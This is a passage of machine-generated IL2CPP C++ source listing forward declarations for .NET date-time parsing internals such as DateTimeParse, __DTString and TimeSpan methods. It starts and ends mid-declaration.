(__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, DTSubString_t0B5F9998AD0833CCE29248DE20EFEBFE9EBFB93D ___sub0, const RuntimeMethod* method); // System.Void System.TimeSpan::.ctor(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void TimeSpan__ctor_m44268277AFF84DEF6CA3442907CE8116A982FB87 (TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * __this, int32_t ___hours0, int32_t ___minutes1, int32_t ___seconds2, const RuntimeMethod* method); // System.Boolean System.Char::IsWhiteSpace(System.Char) extern "C" IL2CPP_METHOD_ATTR bool Char_IsWhiteSpace_m8AE1C4157A1E1D8F5022630F4229AB26223BDC6B (Il2CppChar ___c0, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseTimeZone(System.__DTString&,System.TimeSpan&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseTimeZone_mA74CA520A5B9C842CCD4E602AC325C43CFF7C0DF (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 * ___result1, const RuntimeMethod* method); // System.Void System.__DTString::GetRegularToken(System.TokenType&,System.Int32&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR void __DTString_GetRegularToken_mD79E9337E33F2F9535DD89437EEDC2AF3F5A0B39 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, int32_t* ___tokenType0, int32_t* ___tokenValue1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseFraction(System.__DTString&,System.Double&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseFraction_m50CDFE8D39EA1BF918ECEBE6E31E099B80F17B55 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, double* ___result1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::HandleTimeZone(System.__DTString&,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_HandleTimeZone_mA7F93EC5CC7B120970BA0CF78CA0CB5803BEB4CD (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, const RuntimeMethod* method); // System.TokenType System.__DTString::GetSeparatorToken(System.Globalization.DateTimeFormatInfo,System.Int32&,System.Char&) extern "C" IL2CPP_METHOD_ATTR int32_t __DTString_GetSeparatorToken_m2F4CE10AC9C39A5380D3DD5344B81F79C7006EF1 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, int32_t* ___indexBeforeSeparator1, Il2CppChar* ___charBeforeSeparator2, const RuntimeMethod* method); // System.Void System.DateTimeRawInfo::AddNumber(System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTimeRawInfo_AddNumber_m2E5EFAF94BCBCEA2B72C78B5D109377BB97D69F4 (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * __this, int32_t ___value0, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ProcessTerminaltState(System.DateTimeParse/DS,System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ProcessTerminaltState_mDEE6B5911737D96C89B9AA5749F4A8CB86EA838D (int32_t ___dps0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, int32_t* ___styles2, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw3, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi4, const RuntimeMethod* method); // System.Globalization.Calendar System.Globalization.JapaneseCalendar::GetDefaultInstance() extern "C" IL2CPP_METHOD_ATTR Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * JapaneseCalendar_GetDefaultInstance_m2B83AF1289B7F75DC65BAAA788EEA02DEF9F021F (const RuntimeMethod* method); // System.Globalization.DateTimeFormatInfo System.Globalization.DateTimeFormatInfo::GetJapaneseCalendarDTFI() extern "C" IL2CPP_METHOD_ATTR DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * DateTimeFormatInfo_GetJapaneseCalendarDTFI_mF905895C24DE13A3A53CE23530B4958DEE6EB50F (const RuntimeMethod* method); // System.Globalization.Calendar System.Globalization.TaiwanCalendar::GetDefaultInstance() extern "C" IL2CPP_METHOD_ATTR Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 * TaiwanCalendar_GetDefaultInstance_mF5CD5C63640380B1122F443A98A15C8A68BFC1EF (const RuntimeMethod* method); // System.Globalization.DateTimeFormatInfo System.Globalization.DateTimeFormatInfo::GetTaiwanCalendarDTFI() extern "C" IL2CPP_METHOD_ATTR DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * DateTimeFormatInfo_GetTaiwanCalendarDTFI_mB5B91430A2881BCBF7ADD581F1960B1BA6BBBB7B (const RuntimeMethod* method); // System.Boolean System.DateTimeParse::VerifyValidPunctuation(System.__DTString&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_VerifyValidPunctuation_m299ECDE17C72C83E5CE0D00DE1AB48930634DE99 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, const RuntimeMethod* method); // System.Void System.DateTimeResult::SetDate(System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR void DateTimeResult_SetDate_mEBE5CEDE10DC44295DE51B52EE7FC84692DE5CB7 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * __this, int32_t ___year0, int32_t ___month1, int32_t ___day2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::SetDateYMD(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateYMD_m25421E7E3C852432DA2AF85B9B87CC12522C7ECE (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___year1, int32_t ___month2, int32_t ___day3, const RuntimeMethod* method); // System.DateTime System.DateTimeParse::GetDateTimeNow(System.DateTimeResult&,System.Globalization.DateTimeStyles&) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 DateTimeParse_GetDateTimeNow_mBAF702F1D6A3F954D2520AD7B01FCA0F159DD759 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, const RuntimeMethod* method); // System.Int32 System.DateTimeRawInfo::GetNumber(System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t DateTimeRawInfo_GetNumber_mDBE60CA39776210991124099CF150BCF4FA6EE3D (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * __this, int32_t ___index0, const RuntimeMethod* method); // System.Void System.DateTimeParse::GetDefaultYear(System.DateTimeResult&,System.Globalization.DateTimeStyles&) extern "C" IL2CPP_METHOD_ATTR void DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetMonthDayOrder(System.String,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetMonthDayOrder_mBB4BC48898E898A22EB1F203AEE286ED77CE9583 (String_t* ___pattern0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___order2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetYearMonthDayOrder(System.String,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetYearMonthDayOrder_mE9CAC6C3BFC905C6A5FDFD5DD7A701935DF43776 (String_t* ___datePattern0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___order2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::TryAdjustYear(System.DateTimeResult&,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___year1, int32_t* ___adjustedYear2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::SetDateMDY(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateMDY_m15C5D980488D64E3A673443F6382D89F4B52DA7E (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___month1, int32_t ___day2, int32_t ___year3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::SetDateDMY(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateDMY_m7EF8C6A06954821541C20B6780EAF704329CB324 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___day1, int32_t ___month2, int32_t ___year3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::SetDateYDM(System.DateTimeResult&,System.Int32,System.Int32,System.Int32) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_SetDateYDM_m06145EDE4B01E360FD3416E70F72CE50746F2CCE (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___year1, int32_t ___day2, int32_t ___month3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetYearMonthOrder(System.String,System.Globalization.DateTimeFormatInfo,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetYearMonthOrder_mEDFBD53F46F78F077914D6D042E63B05FF79608C (String_t* ___pattern0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t* ___order2, const RuntimeMethod* method); // System.Boolean System.Globalization.DateTimeFormatInfo::YearMonthAdjustment(System.Int32&,System.Int32&,System.Boolean) extern "C" IL2CPP_METHOD_ATTR bool DateTimeFormatInfo_YearMonthAdjustment_mEEF9F16403B844B1E733A88933C24281813EAC92 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * __this, int32_t* ___year0, int32_t* ___month1, bool ___parsedMonthName2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfMNN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfMNN_m7D023A76508B02690AA381F1808836EFC86B3374 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfYMN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYMN_m2E7DC88AEE18C162381DCC0F93043848A21B8B74 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetHebrewDayOfNM(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetHebrewDayOfNM_m4F9314601978E136AD77DBC5D9434C5D360A67FC (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfYM(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYM_m7ED25D38684B48D3985BF08AA31115253AF47805 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetTimeOfN(System.Globalization.DateTimeFormatInfo,System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeOfN_m4240DB94AC85D67E2F15D3E01695908C5EF94075 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetTimeOfNN(System.Globalization.DateTimeFormatInfo,System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeOfNN_m8F29F972206C71BAA5EB4721AB5CAC6ACC987A02 (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetTimeOfNNN(System.Globalization.DateTimeFormatInfo,System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetTimeOfNNN_m59D4D7BB0B637B9E549B9F91C0D7B96EE25BEABF (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfNN(System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfNN_m98D15515975E0B06429DEDCAF14D3083001ADCA0 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfNNN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfNNN_m7DC4B139DB3853458A7854D87E5B9527E0E08E56 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfMN(System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfMN_mA62FE28EDFF83EFD1466C867547B576DC8E68620 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfNM(System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfNM_mB0820186EBFA26130280E286785383C03A8C7277 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t* ___styles1, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw2, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi3, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfYNN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYNN_m60CC9772F4E33623D3ADA795C58851E23EA490E7 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfNNY(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfNNY_mD619397E2B7F801D2F569CA91D5878742C2FD825 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDayOfYN(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDayOfYN_m0AE142EC90410897271ECB3ACBA4D62466DF5436 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDateOfDSN(System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDateOfDSN_m391AABD326E77DA46D71FE1ACCF1C8FCABA4824C (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDateOfNDS(System.DateTimeResult&,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDateOfNDS_m66C24ADF6167A1B0779C0436ED3CBCD602EBEBBB (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::GetDateOfNNDS(System.DateTimeResult&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_GetDateOfNNDS_m1390DC4CE0E6333945D7BD08F124AA0415A700B6 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::TryParse(System.String,System.Globalization.DateTimeFormatInfo,System.Globalization.DateTimeStyles,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_TryParse_m007A28D9FA0561EB92C3DD2D22D293980E15DBB0 (String_t* ___s0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, int32_t ___styles2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method); // System.Void System.DateTimeRawInfo::Init(System.Int32*) extern "C" IL2CPP_METHOD_ATTR void DateTimeRawInfo_Init_m24B8BAAD8B05676BEA0A3BBBE97279EFECA8FACD (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * __this, int32_t* ___numberBuffer0, const RuntimeMethod* method); // System.Boolean System.String::Equals(System.String,System.StringComparison) extern "C" IL2CPP_METHOD_ATTR bool String_Equals_mB42D01789A129C548840C18E9065ACF9412F1F84 (String_t* __this, String_t* ___value0, int32_t ___comparisonType1, const RuntimeMethod* method); // System.Void System.__DTString::.ctor(System.String,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR void __DTString__ctor_mE5FC300B73DE2B23E51414546030AF8625D1109E (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, String_t* ___str0, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::Lex(System.DateTimeParse/DS,System.__DTString&,System.DateTimeToken&,System.DateTimeRawInfo&,System.DateTimeResult&,System.Globalization.DateTimeFormatInfo&,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_Lex_mE8D565FF95FF14B4575857D9DF4056AC92AB4622 (int32_t ___dps0, __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str1, DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * ___dtok2, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw3, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result4, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F ** ___dtfi5, int32_t ___styles6, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ProcessDateTimeSuffix(System.DateTimeResult&,System.DateTimeRawInfo&,System.DateTimeToken&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ProcessDateTimeSuffix_m78BC07D99DB12539C79C1238D753A0FCC1B73CF3 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, DateTimeToken_t436C025529619757E8E523CBE557A4C31C920761 * ___dtok2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseISO8601(System.DateTimeRawInfo&,System.__DTString&,System.Globalization.DateTimeStyles,System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseISO8601_mC6C5A03B75BD943D6CC59E696B0AC2641E1C0C96 (DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw0, __DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str1, int32_t ___styles2, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result3, const RuntimeMethod* method); // System.Boolean System.__DTString::AtEnd() extern "C" IL2CPP_METHOD_ATTR bool __DTString_AtEnd_mE89AB87FFD62B3BA1D1E5B30052947890000EADC (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ProcessHebrewTerminalState(System.DateTimeParse/DS,System.DateTimeResult&,System.Globalization.DateTimeStyles&,System.DateTimeRawInfo&,System.Globalization.DateTimeFormatInfo) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ProcessHebrewTerminalState_m1D9D4E8A87FFACE53E9313F6A469620E24FA573D (int32_t ___dps0, DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result1, int32_t* ___styles2, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw3, DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi4, const RuntimeMethod* method); // System.Void System.DateTimeParse::AdjustTimeMark(System.Globalization.DateTimeFormatInfo,System.DateTimeRawInfo&) extern "C" IL2CPP_METHOD_ATTR void DateTimeParse_AdjustTimeMark_mB9686C681235D376DDE453471FFCC72C9B7DDC6E (DateTimeFormatInfo_tF4BB3AA482C2F772D2A9022F78BF8727830FAF5F * ___dtfi0, DateTimeRawInfo_t9FCF0836569E074269DCA1D04061D8E3720D451E * ___raw1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::AdjustHour(System.Int32&,System.DateTimeParse/TM) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_AdjustHour_mB41992E26807EE20E333ABBCD87EAA1F69024C56 (int32_t* ___hour0, int32_t ___timeMark1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::CheckDefaultDateTime(System.DateTimeResult&,System.Globalization.Calendar&,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_CheckDefaultDateTime_mE0B8DBAE34A78D6A4E4B7FA6660929CA67EB3478 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, Calendar_tF55A785ACD277504CF0D2F2C6AD56F76C6E91BD5 ** ___cal1, int32_t ___styles2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::DetermineTimeZoneAdjustments(System.DateTimeResult&,System.Globalization.DateTimeStyles,System.Boolean) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_DetermineTimeZoneAdjustments_mE29DEB6454825DC2B53BB17FE5268DFC8BA007C6 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___styles1, bool ___bTimeOnly2, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::DateTimeOffsetTimeZonePostProcessing(System.DateTimeResult&,System.Globalization.DateTimeStyles) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_DateTimeOffsetTimeZonePostProcessing_m15829B176BF4A494CB94C200B51506EC9522DF80 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, int32_t ___styles1, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::AdjustTimeZoneToUniversal(System.DateTimeResult&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_AdjustTimeZoneToUniversal_mD183D3A35914ABCE48BE302A3D183882D66AE393 (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::AdjustTimeZoneToLocal(System.DateTimeResult&,System.Boolean) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_AdjustTimeZoneToLocal_mF11CDF50F3F7BA7B4E9B367D992B10736DBD264D (DateTimeResult_tF71BA2895BFBF33241086E9BDF836567EBD2F6AB * ___result0, bool ___bTimeOnly1, const RuntimeMethod* method); // System.TimeSpan System.TimeZoneInfo::GetUtcOffset(System.DateTime,System.TimeZoneInfoOptions) extern "C" IL2CPP_METHOD_ATTR TimeSpan_tA8069278ACE8A74D6DF7D514A9CD4432433F64C4 TimeZoneInfo_GetUtcOffset_m543BC61BBFD48C648B812E442987E412E502F64A (TimeZoneInfo_t46EF9BAEAA787846F1A1EC419BE75CFEFAFF6777 * __this, DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 ___dateTime0, int32_t ___flags1, const RuntimeMethod* method); // System.Void System.__DTString::SkipWhiteSpaces() extern "C" IL2CPP_METHOD_ATTR void __DTString_SkipWhiteSpaces_mB4AA5270916EF04CD52A4F3C16B1FB08D0B0CF4F (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, const RuntimeMethod* method); // System.Boolean System.DateTimeParse::ParseDigits(System.__DTString&,System.Int32,System.Int32&) extern "C" IL2CPP_METHOD_ATTR bool DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * ___str0, int32_t ___digitLen1, int32_t* ___result2, const RuntimeMethod* method); // System.Boolean System.__DTString::Match(System.Char) extern "C" IL2CPP_METHOD_ATTR bool __DTString_Match_mC0335DA3DE8A7B7F93781B52A02655B6889E01B3 (__DTString_t6E7DE2A99E4F15F384EC29CC6CD5185F46818DD9 * __this, Il2CppChar ___ch0, const RuntimeMethod* method); // System.Char System.__DTString::GetChar() extern "C" IL2CPP_METHOD_ATTR Il2CppChar __DTString_GetChar_m15E6D62E27D5EC6E7E726D2E6A719A95A521CAE6 